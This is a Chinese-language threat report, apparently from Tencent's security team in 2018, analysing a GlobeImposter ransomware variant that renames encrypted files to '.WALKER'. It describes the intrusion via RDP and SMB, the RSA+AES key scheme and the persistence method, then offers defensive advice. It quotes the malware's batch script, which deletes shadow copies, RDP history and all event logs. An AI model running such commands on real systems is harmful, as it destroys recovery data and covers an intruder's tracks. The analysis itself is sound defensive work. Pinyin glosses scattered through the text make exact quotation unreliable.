騰訊禦見威脅情報中心（下稱騰訊安全）于2018.8.26日監控到國內(nèi)某重要通(tōng)信廠商多(duō)地子公司發生(shēng)GlobeImposter勒索病毒攻擊事件，其中病毒樣本攻擊變種與8.24日騰訊安全發布的GlobeImposter勒索病毒預警中樣本有(yǒu)所區(qū)别，其加密後将文件後綴名改為(wèi)“WALKER”。 0x1 概述 騰訊禦見威脅情報中心（下稱騰訊安全）于2018.8.26日監控到國內(nèi)某重要通(tōng)信廠商多(duō)地子公司發生(shēng)GlobeImposter勒索病毒攻擊事件，其中病毒樣本攻擊變種與8.24日騰訊安全發布的GlobeImposter勒索病毒預警中樣本有(yǒu)所區(qū)别，其加密後将文件後綴名改為(wèi)“WALKER”。 經過騰訊安全緊急分析，此次GlobeImposter勒索病毒變種攻擊的主要方式仍是暴力破解RDP遠程登錄密碼後，再進一步在內(nèi)網橫向滲透。值得(de)注意的是，與近期其他版本勒索病毒主要針對服務器(qì)以及數(shù)據庫文件加密不同，此次爆發的GlobeImposter勒索病毒并不區(qū)分被入侵機器(qì)是否服務器(qì)，一旦入侵成功後直接感染。除個(gè)别路徑外，所有(yǒu)文件都被加密為(wèi)後辍名為(wèi)“WALKER”的文件。 除上(shàng)述某重要通(tōng)信廠商外，騰訊安全監控到7月底開(kāi)始有(yǒu)不同行(xíng)業的各企業遭受此次WALKER變種攻擊。攻擊者疑似有(yǒu)意選擇8.25日-8.26日周末期間(jiān)進行(xíng)大(dà)規模入侵，我們預測近一周可(kě)能有(yǒu)較多(duō)企業遭受類似攻擊。 GlobeImposter勒索病毒在一段時(shí)間(jiān)內(nèi)并無實質性技(jì)術(shù)更新，近日在部分企業內(nèi)網爆發，對個(gè)人(rén)電(diàn)腦(nǎo)用戶影(yǐng)響較小(xiǎo)。我們提醒企業用戶高(gāo)度重視(shì)近期GlobeImposter勒索病毒的破壞行(xíng)為(wèi)，提前備份關鍵業務系統，避免遭遇勒索病毒破壞之後業務系統出現嚴重損失。 對于已經中毒的系統，建議在內(nèi)網下線處理(lǐ)，病毒清理(lǐ)完畢才能重新接入網絡。內(nèi)網其他未中毒的電(diàn)腦(nǎo)，使用弱口令登錄的建議盡快修改，使用由字母、數(shù)字和(hé)特殊字符組合的複雜密碼，避免攻擊者暴力破解成功（企業網管可(kě)配置強制(zhì)使用強壯密碼，杜絕使用弱密碼登錄）；及時(shí)修複操作(zuò)系統補丁，避免因漏洞導緻攻擊入侵事件發生(shēng)；終端用戶若不使用遠程桌面登錄服務，建議關閉；局域網內(nèi)已發生(shēng)勒索病毒入侵的，可(kě)暫時(shí)關閉135，139，445端口（暫時(shí)禁用Server服務）以減少(shǎo)遠程入侵的可(kě)能。 0x2 影(yǐng)響評級 高(gāo)危，黑(hēi)客首先會(huì)入侵企業內(nèi)網，之後再通(tōng)過暴力破解RDP和(hé)SMB服務在內(nèi)網繼續擴散。除個(gè)别文件夾外，都被加密，除非得(de)到密鑰，受損文件無法解密還(hái)原。   0x3 影(yǐng)響面 Windows系統的電(diàn)腦(nǎo)會(huì)被波及，目前，禦見威脅情報中心發現廣東、河(hé)南、黑(hēi)龍江等地已有(yǒu)多(duō)個(gè)企業受害，預計(jì)近期還(hái)會(huì)有(yǒu)增加。 0x4 樣本分析 入侵分析 1、從某感染用戶機器(qì)上(shàng)可(kě)以看到，8月25日至8月26日淩晨有(yǒu)大(dà)量445端口爆破記錄 圖1 攻擊源是內(nèi)網中非本地區(qū)的某台機器(qì)，顯示該企業內(nèi)各地分公司都已存在相應風險。 樣本分析 加密算(suàn)法說明(míng) 勒索病毒使用了RSA+AES加密方式，加密過程中涉及兩對RSA密鑰(分别為(wèi)黑(hēi)客公私鑰和(hé)用戶公私鑰，分别用hacker_rsa_xxx和(hé)user_rsa_xxx表示這兩對密鑰)和(hé)一對AES密鑰。黑(hēi)客RSA密鑰用于加密用戶RSA密鑰，用戶RSA密鑰用于加密AES密鑰，AES密鑰用于加密文件內(nèi)容。 具體(tǐ)的加密過程為(wèi)：勒索病毒首先解碼出一個(gè)內(nèi)置的RSA公鑰(hacker_rsa_pub)，同時(shí)對每個(gè)受害用戶，使用RSA生(shēng)成公私鑰（user_rsa_pub和(hé)user_rsa_pri），其中生(shēng)成的密鑰信息使用內(nèi)置的RSA公鑰(hacker_rsa_Public)進行(xíng)加密後，做(zuò)為(wèi)用戶ID。在遍曆系統文件，對符合加密要求的文件進行(xíng)加密。對每個(gè)文件，通(tōng)過CoCreateGuid生(shēng)成一個(gè)唯一标識符，并由該唯一标識符最終生(shēng)成AES密鑰(記為(wèi)file_aes_key)，對文件進行(xíng)加密。在加密文件的過程中，該唯一标識符會(huì)通(tōng)過RSA公鑰 (user_rsa_pub) 加密後保存到文件中。 黑(hēi)客在收到贖金、用戶ID和(hé)文件後，通(tōng)過自己的私鑰(hacker_rsa_pri)解密用戶ID,可(kě)以得(de)到user_rsa_pri，使用user_rsa_pri解密文件，就可(kě)以得(de)到文件的file_aes_key，進而可(kě)以通(tōng)過AES算(suàn)法解密出原始文件。 圖2 自啓動分析 惡意代碼樣本為(wèi)了防止被輕易地分析，加密了大(dà)多(duō)數(shù)字符串和(hé)一部分API，運行(xíng)後會(huì)在內(nèi)存中動态解密，解密後可(kě)以看到樣本在加密時(shí)排除的文件夾與後綴名。首先獲取環境變量“%LOCALAPPADATA%”、“%APPDATA%”的路徑，若獲取不到則退出；獲取到後，将自身拷貝到該目錄下，然後添加自啓動項。   圖3 複制(zhì)之後，将路徑寫到以下注冊表項中 HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\BrowserUpdateCheck，使得(de)自身能夠開(kāi)機自啓動 圖4 加密過程分析 獲取當前機器(qì)上(shàng)每個(gè)盤符： 圖5 對每個(gè)盤符分别創建一個(gè)線程，進行(xíng)文件加密 圖6 加密文件前，首先會(huì)過濾掉後綴為(wèi).WALKER，文件名為(wèi)HOW_TO_BACK_FILES.html以及保存用戶ID的文件，此外還(hái)會(huì)過濾掉如下路徑下的文件： 圖7 然後進行(xíng)加密 圖8 GlobeImposter對文件的加密使用的是AES加密算(suàn)法。AES加密的KEY在本地随機生(shēng)成。首先AES加密時(shí)的IV參數(shù)由當前文件的大(dà)小(xiǎo)和(hé)文件路徑共同生(shēng)成。IV參數(shù)将MD(filesize|| filename )後取前16位。 圖9 将IV與另外生(shēng)成的secret key使用MBEDTLS_MD_SHA256計(jì)算(suàn)2次HASH，并将HASH結果做(zuò)為(wèi)AES加密的KEY 圖10 随後，使用內(nèi)置的RSA公鑰将guid進行(xíng)加密，并将加密過的guid及用戶ID寫入到當前文件中。 圖11 最後用AES加密文件內(nèi)容 圖12 自删除分析 通(tōng)過調用CMD /c del，來(lái)進行(xíng)自删除 圖13 在Temp目錄下，釋放.bat腳本文件，主要用來(lái)删除遠程桌面連接信息文件default.rdp，并通(tōng)過wevtutil.exe cl命令删除日志(zhì)信息 圖14 解密出來(lái)的bat文件內(nèi)容如下 @echo off vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"     0x5 解決方案 Ø  全網安裝專業的終端安全管理(lǐ)軟件，由管理(lǐ)員批量殺毒和(hé)安裝補丁，後續定期更新各類系統高(gāo)危補丁。 Ø  部署流量監控/阻斷類設備/軟件，便于事前發現,事中阻斷和(hé)事後回溯。 Ø  建議由于其他原因不能及時(shí)安裝補丁的系統，考慮在網絡邊界、路由器(qì)、防火(huǒ)牆上(shàng)設置嚴格的訪問控制(zhì)策略，以保證網絡的動态安全。 Ø  建議對于存在弱口令的系統，需在加強使用者安全意識的前提下，督促其修改密碼，或者使用策略來(lái)強制(zhì)限制(zhì)密碼長度和(hé)複雜性。 Ø  建議對于存在弱口令或是空(kōng)口令的服務，在一些(xiē)關鍵服務上(shàng)，應加強口令強度，同時(shí)需使用加密傳輸方式，對于一些(xiē)可(kě)關閉的服務來(lái)說，建議關閉不要的服務端口以達到安全目的。不使用相同口令管理(lǐ)多(duō)台關鍵服務器(qì)。 Ø  建議網絡管理(lǐ)員、系統管理(lǐ)員、安全管理(lǐ)員關注安全信息、安全動态及最新的嚴重漏洞，攻與防的循環，伴随每個(gè)主流操作(zuò)系統、應用服務的生(shēng)命周期。 Ø  建議對數(shù)據庫賬戶密碼策略建議進行(xíng)配置，對最大(dà)錯誤登錄次數(shù)、超過有(yǒu)效次數(shù)進行(xíng)鎖定、密碼有(yǒu)效期、到期後的寬限時(shí)間(jiān)、密碼重用等策略進行(xíng)加固設置。 Ø  建議對數(shù)據庫的管理(lǐ)訪問節點地址進行(xíng)嚴格限制(zhì)，隻允許特定管理(lǐ)主機IP進行(xíng)遠程登錄數(shù)據庫。 為(wèi)防止黑(hēi)客入侵，需要更加完善的防護體(tǐ)系：各終端使用騰訊禦點防止病毒攻擊，禦點具備終端殺毒統一管控、修複漏洞統一管控，以及策略管控等全方位的安全管理(lǐ)功能，可(kě)幫助醫(yī)療機構管理(lǐ)者全面了解、管理(lǐ)企業內(nèi)網安全狀況、保護醫(yī)療機構網絡信息安全。 除此之外，在內(nèi)網部署騰訊禦界高(gāo)級威脅檢測系統、騰訊禦見安全态勢感知平台和(hé)騰訊禦知網絡空(kōng)間(jiān)風險雷達等産品，在終端安全、邊界安全、網站(zhàn)監測、統一監控方面建立一套集風險監測、分析、預警、響應和(hé)可(kě)視(shì)化為(wèi)一體(tǐ)的安全體(tǐ)系，全方位立體(tǐ)化保障企業用戶的網絡安全，及時(shí)阻止黑(hēi)客入侵。 為(wèi)防止遭勒索病毒攻擊，各企業用戶應及時(shí)給服務器(qì)打好安全補丁，盡量關閉不必要的文件共享、端口和(hé)服務，采用高(gāo)強度的唯一服務器(qì)帳号/密碼并定期更換，對沒有(yǒu)互聯需求的服務器(qì)/工作(zuò)站(zhàn)內(nèi)部訪問設置訪問控制(zhì)，在終端電(diàn)腦(nǎo)上(shàng)使用騰訊 “禦點”防禦病毒木馬攻擊。 圖15 同時(shí)，推薦企業用戶關鍵業務配置備份系統，将重要業務數(shù)據創建多(duō)個(gè)備份和(hé)異地備份，避免備份數(shù)據也被勒索病毒破壞。一旦有(yǒu)病毒感染事件發生(shēng)，也可(kě)快速恢複重建業務系統，避免重大(dà)損失發生(shēng)。 個(gè)人(rén)用戶可(kě)及時(shí)安裝操作(zuò)系統漏洞補丁，安全備份重要數(shù)據及文件，同時(shí)開(kāi)啓文檔守護者以免遭勒索病毒破壞。